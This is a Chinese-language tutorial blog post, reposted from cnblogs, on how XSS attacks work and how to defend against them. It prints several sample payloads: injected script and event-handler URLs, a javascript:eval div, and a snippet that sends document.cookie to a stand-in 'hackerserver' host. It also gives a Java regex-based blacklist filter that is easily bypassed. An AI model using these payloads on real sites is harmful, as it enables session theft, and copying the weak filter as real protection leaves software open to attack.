淺談XSS攻擊原理與解決方法

一、概述

　　XSS攻擊是Web攻擊中最常見的攻擊方法之一，它是通過對網頁注入可執行代碼且成功地被瀏覽器 執行，達到攻擊的目的，形成了一次有效XSS攻擊。一旦攻擊成功，它可以獲取用戶的聯系人列表，然后向聯系人發送虛假詐騙信息，可以刪除用戶的日志等等，有時候還和其他攻擊方式同時實施比如SQL注入攻擊服務器和數據庫、Click劫持、相對鏈接劫持等實施釣魚，它帶來的危害是巨 大的，是web安全的頭號大敵。

二、攻擊的條件

　　實施XSS攻擊需要具備兩個條件：

　　一、需要向web頁面注入惡意代碼；

　　二、這些惡意代碼能夠被瀏覽器成功的執行。

　　看一下下面這個例子：

<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"
        code="var a = document.createElement('a');
        a.innerHTML= '執行了惡意代碼';document.body.appendChild(a);
        //這這里執行代碼
        "></div>

　　這段代碼在舊版的IE8和IE8以下的版本都是可以被執行的，火狐也能執行代碼，但火狐對其禁止訪問DOM對象，所以在火狐下執行將會看到控制里拋出異常：document is not defined （document是沒有定義的）

　　再來看一下面這段代碼：

<div>
  <img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />
  </div>

　　相信很多程序員都覺得這個代碼很正常，其實這個代碼就存在一個反射型的XSS攻擊，假如輸入下面的地址：

http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="
最終反射出來的HTML代碼：
    <div>
    <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />
    </div>

 　　也許您會覺得把ValidateRequest設置為true或者保持默認值就能高枕無憂了，其實這種情況還可以輸入下面的地址達到相同的攻擊效果：

http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="

 三、根據XSS攻擊的效果可以分為幾種類型

　　1、XSS反射型攻擊：惡意代碼並沒有保存在目標網站，通過引誘用戶點擊一個鏈接到目標網站的惡意鏈接來實施攻擊的。

　　2、XSS存儲型攻擊：惡意代碼被保存到目標網站的服務器中，這種攻擊具有較強的穩定性和持久性，比較常見場景是在博客，論壇等社交網站上，但OA系統，和CRM系統上也能看到它身影，比如：某CRM系統的客戶投訴功能上存在XSS存儲型漏洞，黑客提交了惡意攻擊代碼，當系統管理員查看投訴信息時惡意代碼執行，竊取了客戶的資料，然而管理員毫不知情，這就是典型的XSS存儲型攻擊。

四、XSS攻擊能做些什么

　　1、竊取cookies，讀取目標網站的cookie發送到黑客的服務器上，如下面的代碼： 

var i=document.createElement("img");
document.body.appendChild(i);
i.src = "http://www.hackerserver.com/?c=" + document.cookie;

 　　2、讀取用戶未公開的資料，如果：郵件列表或者內容、系統的客戶資料，聯系人列表等等，如代碼。

五、解決方法

　　1、一種方法是在表單提交或者url參數傳遞前，對需要的參數進行過濾。請看如下XSS過濾工具類代碼

　　在項目的web.xml配置過濾器： 

    <filter>  
        <filter-name>XssEscape</filter-name>  
        <filter-class>XssFilter</filter-class>  
    </filter>  
    <filter-mapping>  
        <filter-name>XssEscape</filter-name>  
        <url-pattern>/*</url-pattern>  
    </filter-mapping>

 　　XssFilter實現：

public class XssFilter implements Filter {
    
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response,
            FilterChain chain) throws IOException, ServletException {
        chain.doFilter(new XssHttpServletRequestWrapper((HttpServletRequest) request), response);
    }

    @Override
    public void destroy() {
    }  
}

　　XssHttpServletRequestWrapper實現：

public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {

    public XssHttpServletRequestWrapper(HttpServletRequest request) {
        super(request);
    }

    @SuppressWarnings("rawtypes")
    public Map<String,String[]> getParameterMap(){
        Map<String,String[]> request_map = super.getParameterMap();
        Iterator iterator = request_map.entrySet().iterator();
        while(iterator.hasNext()){
            Map.Entry me = (Map.Entry)iterator.next();
            String[] values = (String[])me.getValue();
            for(int i = 0 ; i < values.length ; i++){
                values[i] = xssClean(values[i]);
            }
        }
        
        return request_map;
    }
     public String[] getParameterValues(String paramString)
      {
        String[] arrayOfString1 = super.getParameterValues(paramString);
        if (arrayOfString1 == null)
          return null;
        int i = arrayOfString1.length;
        String[] arrayOfString2 = new String[i];
        for (int j = 0; j < i; j++){
            arrayOfString2[j] = xssClean(arrayOfString1[j]);
        }
        return arrayOfString2;
      }

      public String getParameter(String paramString)
      {
        String str = super.getParameter(paramString);
        if (str == null)
          return null;
        return xssClean(str);
      }

      public String getHeader(String paramString)
      {
        String str = super.getHeader(paramString);
        if (str == null)
          return null;
        str = str.replaceAll("\r|\n", "");
        return xssClean(str);
      }
      
      
      private String xssClean(String value) {
        //ClassLoaderUtils.getResourceAsStream("classpath:antisamy-slashdot.xml", XssHttpServletRequestWrapper.class)
        if (value != null) {
            // NOTE: It's highly recommended to use the ESAPI library and
            // uncomment the following line to
            // avoid encoded attacks.
            // value = encoder.canonicalize(value);
            value = value.replaceAll("\0", "");
            
            // Avoid anything between script tags
            Pattern scriptPattern = Pattern.compile("<script>(.*?)</script>",
                    Pattern.CASE_INSENSITIVE);
            value = scriptPattern.matcher(value).replaceAll("");

            // Avoid anything in a src='...' type of expression
            scriptPattern = Pattern.compile("src[\r\n]*=[\r\n]*\\\'(.*?)\\\'",
                    Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
                            | Pattern.DOTALL);
            value = scriptPattern.matcher(value).replaceAll("");
            // Avoid anything in a href='...' type of expression
            scriptPattern = Pattern.compile("href[\r\n]*=[\r\n]*\\\"(.*?)\\\"",
                                Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
                                        | Pattern.DOTALL);
            value = scriptPattern.matcher(value).replaceAll("");
            

            // Remove any lonesome </script> tag
            scriptPattern = Pattern.compile("</script>",
                    Pattern.CASE_INSENSITIVE);
            value = scriptPattern.matcher(value).replaceAll("");

            // Remove any lonesome <script ...> tag
            scriptPattern = Pattern.compile("<script(.*?)>",
                    Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
                            | Pattern.DOTALL);
            value = scriptPattern.matcher(value).replaceAll("");

            // Avoid eval(...) expressions
            scriptPattern = Pattern.compile("eval\\((.*?)\\)",
                    Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
                            | Pattern.DOTALL);
            value = scriptPattern.matcher(value).replaceAll("");

            // Avoid expression(...) expressions
            scriptPattern = Pattern.compile("expression\\((.*?)\\)",
                    Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
                            | Pattern.DOTALL);
            value = scriptPattern.matcher(value).replaceAll("");

            // Avoid javascript:... expressions
            scriptPattern = Pattern.compile("javascript:",
                    Pattern.CASE_INSENSITIVE);
            value = scriptPattern.matcher(value).replaceAll("");

            // Avoid vbscript:... expressions
            scriptPattern = Pattern.compile("vbscript:",
                    Pattern.CASE_INSENSITIVE);
            value = scriptPattern.matcher(value).replaceAll("");

            // Avoid onload= expressions
            scriptPattern = Pattern.compile("onload(.*?)=",
                    Pattern.CASE_INSENSITIVE | Pattern.MULTILINE
                            | Pattern.DOTALL);
            value = scriptPattern.matcher(value).replaceAll("");
        }  
          return value; 
          }
}

　　二、 過濾用戶輸入的 檢查用戶輸入的內容中是否有非法內容。如<>（尖括號）、”（引號）、 ‘（單引號）、%（百分比符號）、;（分號）、()（括號）、&（& 符號）、+（加號）等，嚴格控制輸出。

可以利用下面這些函數對出現xss漏洞的參數進行過濾
1、htmlspecialchars() 函數,用於轉義處理在頁面上顯示的文本。
2、htmlentities() 函數,用於轉義處理在頁面上顯示的文本。
3、strip_tags() 函數,過濾掉輸入、輸出里面的惡意標簽。
4、header() 函數,使用header("Content-type:application/json"); 用於控制 json 數據的頭部，不用於瀏覽。
5、urlencode() 函數,用於輸出處理字符型參數帶入頁面鏈接中。
6、intval() 函數用於處理數值型參數輸出頁面中。
7、自定義函數,在大多情況下，要使用一些常用的 html 標簽，以美化頁面顯示，如留言、小紙條。那么在這樣的情況下，要采用白名單的方法使用合法的標簽顯示，過濾掉非法的字符。

各語言示例：
  PHP的htmlentities()或是htmlspecialchars()。
   Python的cgi.escape()。
   ASP的Server.HTMLEncode()。
   ASP.NET的Server.HtmlEncode()或功能更強的Microsoft Anti-Cross Site Scripting Library
   Java的xssprotect(Open Source Library)。
   Node.js的node-validator。

 

轉載於：https://www.cnblogs.com/shawWey/p/8480452.html